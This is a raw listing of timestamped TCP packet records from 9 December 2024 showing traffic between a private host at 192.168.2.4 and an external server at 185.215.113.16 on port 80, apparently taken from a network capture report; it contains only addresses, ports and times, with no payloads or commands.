                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076731920 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076776981 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076832056 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076842070 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076874018 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077644110 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077708006 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077723026 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077778101 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.078088045 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.078147888 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.078212976 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.078243017 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.195509911 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.195576906 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.195645094 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.199712992 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.201445103 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.201457024 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.201504946 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.201522112 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.268914938 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.268932104 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.268968105 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.268985033 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.273036957 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.273509026 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.274538994 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.274590969 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.274631023 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.274677038 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.282984972 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.283051968 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.283097982 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.292210102 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.292269945 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.292318106 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.292356014 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.299758911 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.299806118 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.299892902 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.299933910 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.308959961 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.309020996 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.309103966 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.309149981 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.317224026 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.317332983 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.317521095 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.317622900 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.325773954 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.325819016 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.325894117 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.325938940 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.333559990 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.333575010 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.333619118 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.340044975 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.340065956 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.340090990 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.340116024 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.445730925 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.445804119 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.445857048 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.447973967 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.450994968 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.489130974 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.489191055 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.489263058 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.489315987 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.491350889 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.491394997 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.491470098 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.491508961 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.495718956 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.495773077 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.497236967 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.497287035 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.497426033 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.497467041 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.501665115 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.501715899 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.501744986 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.501782894 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.506268978 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.506313086 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.506376982 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.506516933 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.510432005 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.510505915 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.510586977 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.510629892 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.514801025 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.514893055 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.514949083 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.514990091 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.519203901 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.519248962 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.519304991 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.519351959 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.523610115 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.523655891 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.523690939 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.523734093 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.528038979 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.528122902 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.528137922 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.528177023 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.532346010 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.532468081 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.532493114 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.532505989 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.536780119 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.536835909 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.536879063 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.536916971 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.541210890 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.541249037 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.541280031 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.541357994 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.545552969 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.545681000 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.545695066 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.545727015 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.549921036 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.549978018 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.550031900 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.550087929 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.554363966 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.554394007 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.554413080 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.554438114 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.558737993 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.558824062 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.558841944 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.558855057 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.563210011 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.563272953 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.563306093 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.563389063 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.567488909 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.567611933 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.567656994 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.571913958 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.571955919 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.571976900 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.572000027 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.637825966 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.637928009 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.637947083 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.637969017 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.640038013 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.640089035 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.640153885 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.640202045 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.644427061 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.644546986 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.681412935 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.681444883 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.681462049 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.681476116 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.683269024 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.683317900 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.683355093 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.683391094 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.687345982 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.687392950 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.687414885 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.687428951 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.691293955 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.691350937 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.691407919 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.691446066 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.695226908 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.695277929 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.695333004 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.695363998 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.699034929 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.699081898 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.699120998 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.699161053 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.702704906 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.702812910 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.702862024 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.706585884 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.706650019 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.706698895 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.710267067 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.710304022 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.710380077 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.710416079 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.713850975 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.713916063 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.713963032 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.714000940 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.717510939 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.717617989 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.717672110 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.721155882 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.721229076 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.721271992 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.721316099 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.724828959 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.724874973 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.724896908 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.724942923 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.728507996 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.728606939 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.728651047 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.732278109 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.732319117 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.732367039 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.735913992 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.735970974 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.736022949 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.739593029 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.739649057 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.739702940 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.739746094 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.743607998 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.743715048 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.743846893 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.746984005 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.747097969 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.747148991 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.750675917 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.750736952 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.750777960 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.750811100 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.754493952 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.754606009 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.754657984 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.758140087 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.758222103 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.758282900 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.761809111 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.761872053 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.762017012 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.762079954 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.765436888 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.765556097 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.765628099 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.771303892 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.771338940 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.771431923 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.772172928 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.772186041 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.772223949 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.772258043 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.774315119 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.774441004 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.774492979 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.777349949 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.777491093 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.777540922 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.780249119 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.780297041 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.780343056 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.780379057 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.783173084 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.783456087 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.783516884 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.786045074 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.786103964 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.786122084 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.786159992 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.788935900 CET8049838185.215.113.16192.168.2.4
